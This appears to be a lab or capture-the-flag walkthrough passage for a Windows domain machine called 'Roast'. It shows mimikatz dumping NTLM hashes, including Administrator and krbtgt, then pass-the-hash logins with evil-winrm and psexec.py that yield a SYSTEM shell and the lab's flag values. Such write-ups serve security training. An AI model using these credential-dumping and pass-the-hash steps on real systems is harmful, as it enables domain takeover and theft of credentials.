cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::lsa /patch
Domain : ROAST0 / S-1-5-21-4133422454-1522376082-951199702

RID : 000001f4 (500)
User : Administrator
LM :
NTLM : f6861a8cfc1c3b9f3ff39a8adb6bd388

RID : 000001f5 (501)
User : Guest
LM :
NTLM :

RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 016e928748d559770ee5fe3028baf718

RID : 0000044f (1103)
User : dsmith
LM :
NTLM : a0a8160111b21d48d2e816f4cc8da053

RID : 00000450 (1104)
User : crhodes
LM :
NTLM : a0a8160111b21d48d2e816f4cc8da053

RID : 00000451 (1105)
User : ssmith
LM :
NTLM : 23991f3cd665b0bc1f7cccfd62506161

RID : 00000452 (1106)
User : roastsvc
LM :
NTLM : 2f77331cfd7b2142b3a86a7d2ce7e824

RID : 000003e8 (1000)
User : ROAST$
LM :
NTLM : 0db85ab8c8395c6c1333a4e9e90ae400

mimikatz(commandline) # exit
Bye!
*Evil-WinRM* PS C:\users\roastsvc\Documents>
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u Administrator -H f6861a8cfc1c3b9f3ff39a8adb6bd388

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

The Administrator NT hash is enough to authenticate without ever knowing the password: evil-winrm takes it with -H, and psexec.py with -hashes LMHASH:NTHASH. Below the NT hash was pasted into both halves; that is harmless, because NTLM authentication never uses the LM half, but the conventional placeholder for a missing LM hash is aad3b435b51404eeaad3b435b51404ee.

kali@kali:/opt/evil-winrm$ psexec.py -hashes f6861a8cfc1c3b9f3ff39a8adb6bd388:f6861a8cfc1c3b9f3ff39a8adb6bd388 administrator@172.31.3.2
Impacket v0.9.22.dev1+20200813.221956.1c893884 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 172.31.3.2.....
[*] Found writable share ADMIN$
[*] Uploading file EqimrmMk.exe
[*] Opening SVCManager on 172.31.3.2.....
[*] Creating service Plxk on 172.31.3.2.....
[*] Starting service Plxk.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
Roast

C:\Windows\system32>


kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u Administrator -H f6861a8cfc1c3b9f3ff39a8adb6bd388

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
Roast
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\desktop> type system.txt.txt
9d91f887b78d82444a5af8bbd0d115db
*Evil-WinRM* PS C:\Users> Get-ChildItem -Path C:\Users -Filter *.txt.txt -Recurse -ErrorAction SilentlyContinue -Force
*Evil-WinRM* PS C:\Users> type C:\Users\roastsvc\Desktop\access.txt
0042894e0a6b2bc2c4517c5f7ccc5c16

https://m.twitch.tv/videos/708116376

Author : Puckiestyle